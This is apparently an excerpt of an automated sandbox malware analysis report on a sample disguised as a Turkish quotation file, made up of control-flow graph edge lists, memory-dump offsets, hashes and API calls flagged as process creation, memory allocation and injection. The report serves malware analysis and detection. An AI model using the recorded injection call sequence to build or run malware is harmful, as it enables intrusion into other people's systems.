57c20c5-57c20c9 1956->1966 1967 57c20c2-57c2123 1956->1967 1962 57c206d-57c2091 1957->1962 1963 57c2094-57c20b7 1957->1963 1962->1963 1963->1889 1972 57c20cb-57c20ef 1966->1972 1973 57c20f2-57c2109 1966->1973 1976 57c2128-57c212c 1967->1976 1977 57c2125-57c218d 1967->1977 1972->1973 1986 57c2119-57c211a 1973->1986 1987 57c210b-57c2111 1973->1987 1982 57c212e-57c215e 1976->1982 1983 57c2161-57c2184 1976->1983 1988 57c218f-57c21f7 1977->1988 1989 57c2192-57c2196 1977->1989 1982->1983 1983->1889 1986->1889 1987->1986 1997 57c21fc-57c2200 1988->1997 1998 57c21f9-57c2261 1988->1998 1992 57c2198-57c21c8 1989->1992 1993 57c21cb-57c21e5 1989->1993 1992->1993 2009 57c21ed-57c21ee 1993->2009 2002 57c2235-57c2258 1997->2002 2003 57c2202-57c2232 1997->2003 2007 57c2266-57c226a 1998->2007 2008 57c2263-57c22cb 1998->2008 2002->1889 2003->2002 2011 57c226c-57c229c 2007->2011 2012 57c229f-57c22c2 2007->2012 2017 57c22cd-57c2335 2008->2017 2018 57c22d0-57c22d4 2008->2018 2009->1889 2011->2012 2012->1889 2027 57c233a-57c233e 2017->2027 2028 57c2337-57c239c 2017->2028 2021 57c2309-57c232c 2018->2021 2022 57c22d6-57c2306 2018->2022 2021->1889 2022->2021 2031 57c2340-57c2370 2027->2031 2032 57c2373-57c2396 2027->2032 2037 57c239e-57c23ce 2028->2037 2038 57c23d1-57c23d4 2028->2038 2031->2032 2032->1889 2037->2038 2038->1889
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2230984646.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_57c0000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4']q$4']q
                                                          • API String ID: 0-3120983240
                                                          • Opcode ID: 31ac2c73071d62f4e8cd6c8a866e1420a6ee3cbafdc23d99f8993a3a94d5307c
                                                          • Instruction ID: 560bc2197c927993b740cf4147c5e30f50a0f1ff109a6f67b29de1182a492356
                                                          • Opcode Fuzzy Hash: 31ac2c73071d62f4e8cd6c8a866e1420a6ee3cbafdc23d99f8993a3a94d5307c
                                                          • Instruction Fuzzy Hash: B922E274E05218CFCB24EFA4C5546ADBBB2BF8A301F6090ADD40AAB355CB746E85CF51
                                                          Function 057C18C0 Relevance: 2.9, Strings: 2, Instructions: 362COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2051 57c18c0-57c18e8 2052 57c18ef-57c1918 2051->2052 2053 57c18ea 2051->2053 2054 57c1939 2052->2054 2055 57c191a-57c1923 2052->2055 2053->2052 2056 57c193c-57c1940 2054->2056 2057 57c192a-57c192d 2055->2057 2058 57c1925-57c1928 2055->2058 2059 57c1cf7-57c1d0e 2056->2059 2060 57c1937 2057->2060 2058->2060 2062 57c1d14-57c1d18 2059->2062 2063 57c1945-57c1949 2059->2063 2060->2056 2066 57c1d4d-57c1d51 2062->2066 2067 57c1d1a-57c1d4a 2062->2067 2064 57c194e-57c1952 2063->2064 2065 57c194b-57c19a8 2063->2065 2069 57c197b-57c197e 2064->2069 2070 57c1954-57c1978 2064->2070 2074 57c19ad-57c19b1 2065->2074 2075 57c19aa-57c1a1b 2065->2075 2071 57c1d72 2066->2071 2072 57c1d53-57c1d5c 2066->2072 2067->2066 2084 57c1986-57c199f 2069->2084 2070->2069 2078 57c1d75-57c1d7b 2071->2078 2076 57c1d5e-57c1d61 2072->2076 2077 57c1d63-57c1d66 2072->2077 2080 57c19da-57c19eb 2074->2080 2081 57c19b3-57c19d7 2074->2081 2086 57c1a1d-57c1a7a 2075->2086 2087 57c1a20-57c1a24 2075->2087 2083 57c1d70 2076->2083 2077->2083 2176 57c19ee call 59832c0 2080->2176 2177 57c19ee call 59832b1 2080->2177 2081->2080 2083->2078 2084->2059 2095 57c1a7c-57c1ad8 2086->2095 2096 57c1a7f-57c1a83 2086->2096 2090 57c1a4d-57c1a71 2087->2090 2091 57c1a26-57c1a4a 2087->2091 2090->2059 2091->2090 2108 57c1add-57c1ae1 2095->2108 2109 57c1ada-57c1b3c 2095->2109 2101 57c1aac-57c1acf 2096->2101 2102 57c1a85-57c1aa9 2096->2102 2099 57c19f4-57c1a01 2106 57c1a11-57c1a12 2099->2106 2107 57c1a03-57c1a09 2099->2107 2101->2059 2102->2101 2106->2059 2107->2106 2112 57c1b0a-57c1b22 2108->2112 2113 57c1ae3-57c1b07 2108->2113 2118 57c1b3e-57c1ba0 2109->2118 2119 57c1b41-57c1b45 2109->2119 2130 57c1b24-57c1b2a 2112->2130 2131 57c1b32-57c1b33 2112->2131 2113->2112 2128 57c1ba5-57c1ba9 2118->2128 2129 57c1ba2-57c1c04 2118->2129 2122 57c1b6e-57c1b86 2119->2122 2123 57c1b47-57c1b6b 2119->2123 2141 57c1b88-57c1b8e 2122->2141 2142 57c1b96-57c1b97 2122->2142 2123->2122 2133 57c1bab-57c1bcf 2128->2133 2134 57c1bd2-57c1bea 2128->2134 2139 57c1c09-57c1c0d 2129->2139 2140 57c1c06-57c1c68 2129->2140 2130->2131 2131->2059 2133->2134 2152 57c1bec-57c1bf2 2134->2152 2153 57c1bfa-57c1bfb 2134->2153 2144 57c1c0f-57c1c33 2139->2144 2145 57c1c36-57c1c4e 2139->2145 2150 57c1c6d-57c1c71 2140->2150 2151 57c1c6a-57c1cc3 2140->2151 2141->2142 2142->2059 2144->2145 2163 57c1c5e-57c1c5f 2145->2163 2164 57c1c50-57c1c56 2145->2164 2155 57c1c9a-57c1cbd 2150->2155 2156 57c1c73-57c1c97 2150->2156 2161 57c1cec-57c1cef 2151->2161 2162 57c1cc5-57c1ce9 2151->2162 2152->2153 2153->2059 2155->2059 2156->2155 2161->2059 2162->2161 2163->2059 2164->2163 2176->2099 2177->2099
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2230984646.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_57c0000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4']q$4']q
                                                          • API String ID: 0-3120983240
                                                          • Opcode ID: b731871a52ce7f4b81ac32d79032250529ce0aa183d0b405cb54d9eedf9c7693
                                                          • Instruction ID: 05b3b14a9460e9772fc9c102776d0da30e3b81bd5a6eab823c7317fe30c40249
                                                          • Opcode Fuzzy Hash: b731871a52ce7f4b81ac32d79032250529ce0aa183d0b405cb54d9eedf9c7693
                                                          • Instruction Fuzzy Hash: 84F1BF74E05218DFCB28DFA4E4986ADBBB2FF8A311F60516DE416A7391DB346985CF00
                                                          Function 059379A0 Relevance: 2.8, Strings: 2, Instructions: 343COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2178 59379a0-59379b2 2179 59379b4-59379d5 2178->2179 2180 59379dc-59379e0 2178->2180 2179->2180 2181 59379e2-59379e4 2180->2181 2182 59379ec-59379fb 2180->2182 2181->2182 2183 5937a07-5937a33 2182->2183 2184 59379fd 2182->2184 2188 5937c60-5937ca7 2183->2188 2189 5937a39-5937a3f 2183->2189 2184->2183 2220 5937ca9 2188->2220 2221 5937cbd-5937cc9 2188->2221 2190 5937b11-5937b15 2189->2190 2191 5937a45-5937a4b 2189->2191 2195 5937b17-5937b20 2190->2195 2196 5937b38-5937b41 2190->2196 2191->2188 2194 5937a51-5937a5e 2191->2194 2199 5937af0-5937af9 2194->2199 2200 5937a64-5937a6d 2194->2200 2195->2188 2201 5937b26-5937b36 2195->2201 2197 5937b43-5937b63 2196->2197 2198 5937b66-5937b69 2196->2198 2197->2198 2202 5937b6c-5937b72 2198->2202 2199->2188 2205 5937aff-5937b0b 2199->2205 2200->2188 2204 5937a73-5937a8b 2200->2204 2201->2202 2202->2188 2207 5937b78-5937b8b 2202->2207 2208 5937a97-5937aa9 2204->2208 2209 5937a8d 2204->2209 2205->2190 2205->2191 2207->2188 2211 5937b91-5937ba1 2207->2211 2208->2199 2215 5937aab-5937ab1 2208->2215 2209->2208 2211->2188 2214 5937ba7-5937bb4 2211->2214 2214->2188 2217 5937bba-5937bcf 2214->2217 2218 5937ab3 2215->2218 2219 5937abd-5937ac3 2215->2219 2217->2188 2229 5937bd5-5937bf8 2217->2229 2218->2219 2219->2188 2222 5937ac9-5937aed 2219->2222 2223 5937cac-5937cae 2220->2223 2225 5937cd5-5937cf1 2221->2225 2226 5937ccb 2221->2226 2227 5937cf2-5937d1f call 5933170 2223->2227 2228 5937cb0-5937cbb 2223->2228 2226->2225 2240 5937d21-5937d27 2227->2240 2241 5937d37-5937d39 2227->2241 2228->2221 2228->2223 2229->2188 2234 5937bfa-5937c05 2229->2234 2237 5937c07-5937c11 2234->2237 2238 5937c56-5937c5d 2234->2238 2237->2238 2246 5937c13-5937c29 2237->2246 2243 5937d2b-5937d2d 2240->2243 2244 5937d29 2240->2244 2264 5937d3b call 5938bc0 2241->2264 2265 5937d3b call 5938b70 2241->2265 2266 5937d3b call 5937db8 2241->2266 2267 5937d3b call 5937da8 2241->2267 2243->2241 2244->2241 2245 5937d41-5937d45 2247 5937d90-5937da0 2245->2247 2248 5937d47-5937d5e 2245->2248 2252 5937c35-5937c4e 2246->2252 2253 5937c2b 2246->2253 2248->2247 2256 5937d60-5937d6a 2248->2256 2252->2238 2253->2252 2259 5937d7d-5937d8d 2256->2259 2260 5937d6c-5937d7b 2256->2260 2260->2259 2264->2245 2265->2245 2266->2245 2267->2245
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (aq$d
                                                          • API String ID: 0-3557608343
                                                          • Opcode ID: defcd87cdec5d435e410ba391f899a10ecb82b7a60dcb2bea368a45fdaab92a0
                                                          • Instruction ID: 7c5c1e1a9c6966b4a71017dc3fbd1e444e89e0d6708da483846c0492bce3b574
                                                          • Opcode Fuzzy Hash: defcd87cdec5d435e410ba391f899a10ecb82b7a60dcb2bea368a45fdaab92a0
                                                          • Instruction Fuzzy Hash: 89D14874600606CFCB14CF68C485E6AB7F6FF88310B198969E45A9B765DB30FD42CB94
                                                          Function 05933A18 Relevance: 2.7, Strings: 2, Instructions: 190COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2389 5933a18-5933a3a 2390 5933a40-5933a42 2389->2390 2391 5933b2e-5933b53 2389->2391 2392 5933b5a-5933b7e 2390->2392 2393 5933a48-5933a54 2390->2393 2391->2392 2405 5933b85-5933ba9 2392->2405 2397 5933a56-5933a62 2393->2397 2398 5933a68-5933a78 2393->2398 2397->2398 2397->2405 2398->2405 2406 5933a7e-5933a8c 2398->2406 2416 5933bab 2405->2416 2409 5933a92-5933a97 2406->2409 2410 5933bb0-5933bb4 2406->2410 2449 5933a99 call 5933c28 2409->2449 2450 5933a99 call 5933a18 2409->2450 2411 5933bb5-5933bbf 2410->2411 2418 5933c22-5933c35 call 5930ec8 2411->2418 2419 5933bc1 2411->2419 2413 5933a9f-5933ae8 2440 5933b0b-5933b2b call 5931f70 2413->2440 2441 5933aea-5933b03 2413->2441 2416->2410 2425 5933c3a-5933c48 call 5933170 2418->2425 2419->2416 2421 5933bc2-5933c21 2419->2421 2421->2411 2421->2418 2430 5933c60-5933c62 2425->2430 2431 5933c4a-5933c50 2425->2431 2433 5933c52 2431->2433 2434 5933c54-5933c56 2431->2434 2433->2430 2434->2430 2441->2440 2449->2413 2450->2413
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (aq$Haq
                                                          • API String ID: 0-3785302501
                                                          • Opcode ID: 487d2e4b113382851483c6a0fc064341e19b5d38785d52fda9e8a1392acef92d
                                                          • Instruction ID: 03bb113c65122685ba03b3179b039a67ccf4f1ac78aad7fb12ead2a6fd41420e
                                                          • Opcode Fuzzy Hash: 487d2e4b113382851483c6a0fc064341e19b5d38785d52fda9e8a1392acef92d
                                                          • Instruction Fuzzy Hash: 7261DD303442108FD759ABB9C855A2E7BBBEF85304B2448ADE5069F3A1DF35EC06CB91
                                                          Function 05935FE0 Relevance: 2.6, Strings: 2, Instructions: 147COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2532 5935fe0-5936008 2534 59360f4-5936119 2532->2534 2535 593600e-5936012 2532->2535 2544 5936120-5936131 2534->2544 2536 5936026-593602a 2535->2536 2537 5936014-5936020 2535->2537 2539 5936030-5936047 2536->2539 2540 593614b-5936170 2536->2540 2537->2536 2537->2544 2550 593605b-593605f 2539->2550 2551 5936049-5936055 2539->2551 2557 5936177-59361b0 2540->2557 2555 593613b-5936144 2544->2555 2552 5936061-593607a 2550->2552 2553 593608b-59360a4 call 59330a8 2550->2553 2551->2550 2551->2557 2552->2553 2567 593607c-593607f 2552->2567 2565 59360a6-59360ca 2553->2565 2566 59360cd-59360f1 2553->2566 2555->2540 2557->2555 2575 59361b2-59361b3 2557->2575 2570 5936088 2567->2570 2570->2553
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (aq$(aq
                                                          • API String ID: 0-3916115647
                                                          • Opcode ID: eda86592aed88c8f815db0dee246dc617749fa9e09ddc7d638db0600a3b9a5d2
                                                          • Instruction ID: b4d9b150f2b45bfd5a09d1cbe29fe686644d493f0c1faba7e2c98b64e48623e7
                                                          • Opcode Fuzzy Hash: eda86592aed88c8f815db0dee246dc617749fa9e09ddc7d638db0600a3b9a5d2
                                                          • Instruction Fuzzy Hash: 2551BD313042059FDB559F69D856AAE3BA6FF85300F158069E906CB392CF35EC06CBA0
                                                          Function 0593059F Relevance: 2.6, Strings: 2, Instructions: 140COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (aq$Haq
                                                          • API String ID: 0-3785302501
                                                          • Opcode ID: a756e0b8607db43cc60017dd27318629e0a117e25638192b91a5677fb193e52e
                                                          • Instruction ID: f1ee556eebdbf205c114682ed69831d9226452840144104a3c2270da04073a3e
                                                          • Opcode Fuzzy Hash: a756e0b8607db43cc60017dd27318629e0a117e25638192b91a5677fb193e52e
                                                          • Instruction Fuzzy Hash: 4351E1302047518FE324DF6AC44475BBBE6EFC5314F048A2DE05A8B7A6DB78E805CB51
                                                          Function 0596C2CB Relevance: 2.5, Strings: 2, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $2
                                                          • API String ID: 0-4264767444
                                                          • Opcode ID: 95ff841e50dbbc6fe298fff22208aff6e17940a65729df5dc1ce4568577bf217
                                                          • Instruction ID: 5bf7baa8f1d678a0ae052ff0f1862424679f5395da6b9d1340b768c02a5ce048
                                                          • Opcode Fuzzy Hash: 95ff841e50dbbc6fe298fff22208aff6e17940a65729df5dc1ce4568577bf217
                                                          • Instruction Fuzzy Hash: C821B274A012298FDBA0CF64C894BEDBBB2EB49304F1085E9D41DA7250DB319EC5CF41
                                                          Function 0596BC90 Relevance: 2.5, Strings: 2, Instructions: 39COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: :$A
                                                          • API String ID: 0-646851060
                                                          • Opcode ID: a98bf664ab6d7d199571625581d0cf0950569c5aca94ba36f101e65c0cf8dc14
                                                          • Instruction ID: c69b27a5d957d97e82d1040a32fc62d2cbdf6b35d1cf86429d09d1ee7d8028ab
                                                          • Opcode Fuzzy Hash: a98bf664ab6d7d199571625581d0cf0950569c5aca94ba36f101e65c0cf8dc14
                                                          • Instruction Fuzzy Hash: 82119274905269CFDB61CF54C884BD8BBB1EB19304F1085D9E58DA7250DBB19EC9CF00
                                                          Function 05C758CC Relevance: 2.5, Strings: 2, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2232891361.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5c70000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: )$6
                                                          • API String ID: 0-4136620098
                                                          • Opcode ID: a5b855abee4cf7bb3169c0feb8d942621f5673b59b4f9969359541baabc0ae19
                                                          • Instruction ID: 8cb36cbe79cbba10a561e4a5b9cbaba965c860b0c0e58c383270a2aba062b6c0
                                                          • Opcode Fuzzy Hash: a5b855abee4cf7bb3169c0feb8d942621f5673b59b4f9969359541baabc0ae19
                                                          • Instruction Fuzzy Hash: C4F0DAB090012A8FDB64EF54D488BAA7BB6EB44304F1088E8D119A3641DA755EC59F55
                                                          Function 0593ABF8 Relevance: 1.9, Strings: 1, Instructions: 677COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ,aq
                                                          • API String ID: 0-3092978723
                                                          • Opcode ID: b2f314d036795bddbccf6e0464849955c41213708d35b01b75c26175195968ba
                                                          • Instruction ID: 6c550eb7bbd9fd4ad643005e84640eb0f2f8a2c576ae086b402e293a95225608
                                                          • Opcode Fuzzy Hash: b2f314d036795bddbccf6e0464849955c41213708d35b01b75c26175195968ba
                                                          • Instruction Fuzzy Hash: 98523A75A002288FDB64DF68C985BEDBBF6BF88300F1544D9E549AB351DA309E80CF61
                                                          Function 05934FD0 Relevance: 1.8, Strings: 1, Instructions: 538COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (_]q
                                                          • API String ID: 0-188044275
                                                          • Opcode ID: aa8c1fd34295f18fe0a1272297475c59cbddb868054118df20b1a13db6f0b430
                                                          • Instruction ID: ff2262f878a5e3ca45cf48a2045df4861ce376e6f114564aaec44bbcfb9e9a0c
                                                          • Opcode Fuzzy Hash: aa8c1fd34295f18fe0a1272297475c59cbddb868054118df20b1a13db6f0b430
                                                          • Instruction Fuzzy Hash: C6225D35A00214DFDB04DFA8D495AADB7F6FF88300F168469E906AB3A1DB71ED41CB90
                                                          Function 0598E564 Relevance: 1.8, APIs: 1, Instructions: 265processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0598E7D7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          • Opcode ID: 0136a848d7b4faab23759a7861a38f3342ab96b88f359e4414e7dc3d26f1a7ca
                                                          • Instruction ID: fe2fcaf4bdf4c6fec400e6ae7282bc88ee7bac39e91e7006a70ba2734994daa8
                                                          • Opcode Fuzzy Hash: 0136a848d7b4faab23759a7861a38f3342ab96b88f359e4414e7dc3d26f1a7ca
                                                          • Instruction Fuzzy Hash: 17A13470D00219DFDB10DFA9C895BEDBBB5FF09304F14916AE859A7280DB789985CF81
                                                          Function 0598E570 Relevance: 1.8, APIs: 1, Instructions: 261processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0598E7D7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          • Opcode ID: ccfab3434c37f31fdeb19af31366d9e30b094f56d9df0e61158d74b62e867e77
                                                          • Instruction ID: 957a42558570f1976a8dcd153e49ff23360e9ba28b23ab44d9b86c569c88ec5f
                                                          • Opcode Fuzzy Hash: ccfab3434c37f31fdeb19af31366d9e30b094f56d9df0e61158d74b62e867e77
                                                          • Instruction Fuzzy Hash: C0A12470D00219CFDB10DFA9C895BEEBBB5FF09304F149169E859A7280DB789985CF81
                                                          Function 0598EFE0 Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 0598F0BB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: 1cbbbbd18a5dcc796ee06537cf132f0941e552b2a6b5d2a31552614c848c853f
                                                          • Instruction ID: 80db31ee269fcc41f8b88f9ffab107d4561f0eabe12a9435031670aeda5acd48
                                                          • Opcode Fuzzy Hash: 1cbbbbd18a5dcc796ee06537cf132f0941e552b2a6b5d2a31552614c848c853f
                                                          • Instruction Fuzzy Hash: D841CAB5D012589FCF00DFA9D980AEEFBF1BB09310F20902AE418B7240D338AA45CF64
                                                          Function 0598EFE8 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 0598F0BB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: 66d57a4076e15640d7a5a5c8201b97ac3724d55ad2d3f84fee2e70a60203a56d
                                                          • Instruction ID: f460bc41acf9c6178303a31c862fb20f5e8ff48d05294c1ee5b874fa2b86e606
                                                          • Opcode Fuzzy Hash: 66d57a4076e15640d7a5a5c8201b97ac3724d55ad2d3f84fee2e70a60203a56d
                                                          • Instruction Fuzzy Hash: 24419AB5D012589FCF00DFA9D984AEEFBF1BB49310F10902AE419B7210D739AA45CF64
                                                          Function 0598EE81 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0598EF32
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 14d892137fa262d75be98b6dfab4833650cb45b5db6f877335d003ca4c6a4845
                                                          • Instruction ID: 80267d1651ab2fdf3beaf11aa91c7d79afe00c7eadc066515709f9bdaef6a689
                                                          • Opcode Fuzzy Hash: 14d892137fa262d75be98b6dfab4833650cb45b5db6f877335d003ca4c6a4845
                                                          • Instruction Fuzzy Hash: 2B3197B9D042589FCF10CFA9D980AAEFBB5FB49310F10942AE819B7250D735A945CFA4
                                                          Function 0598EE88 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0598EF32
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 0205f6394580c4824e9a0ddace57c9a7e4fdf2b868baa0bf870e6baa7147cfe7
                                                          • Instruction ID: 776ae381270046f54bca71f01b05bbb0cda2a69ed3d09d5579269ab72b2c4dea
                                                          • Opcode Fuzzy Hash: 0205f6394580c4824e9a0ddace57c9a7e4fdf2b868baa0bf870e6baa7147cfe7
                                                          • Instruction Fuzzy Hash: 2A3188B8D04258DFCF10DFA9D980AEEFBB5BB49310F10942AE815B7210D735A945CFA5
                                                          Function 0598F4D1 Relevance: 1.6, APIs: 1, Instructions: 99memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0598F57C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 359e9be4b52317684048b9cbe251abc800ae12b236bef58c321b8e1db8523c4a
                                                          • Instruction ID: 7580225b7b341903f96cc3eeb31b963daf38fd75f77094a5965c5797cea43896
                                                          • Opcode Fuzzy Hash: 359e9be4b52317684048b9cbe251abc800ae12b236bef58c321b8e1db8523c4a
                                                          • Instruction Fuzzy Hash: 9E31BBB4D002589FCB10DFA9D584AEEFBF5BF49310F14942AE819B7210D735A945CF94
                                                          Function 0598F4D8 Relevance: 1.6, APIs: 1, Instructions: 98memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0598F57C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 7c27bb61279c6be019a7aceadbadecb308fd7826376d4511bf4defb51742b264
                                                          • Instruction ID: be8418eb371c150305e744b4df5582202d59a6cb9c39d715da945d281629ec88
                                                          • Opcode Fuzzy Hash: 7c27bb61279c6be019a7aceadbadecb308fd7826376d4511bf4defb51742b264
                                                          • Instruction Fuzzy Hash: 2C31CAB4D002589FCB10DFAAD884AEEFBB1BF09310F14942AE815B7210C739A945CFA4
                                                          Function 05A0D598 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON
                                                          Download Yara Rule
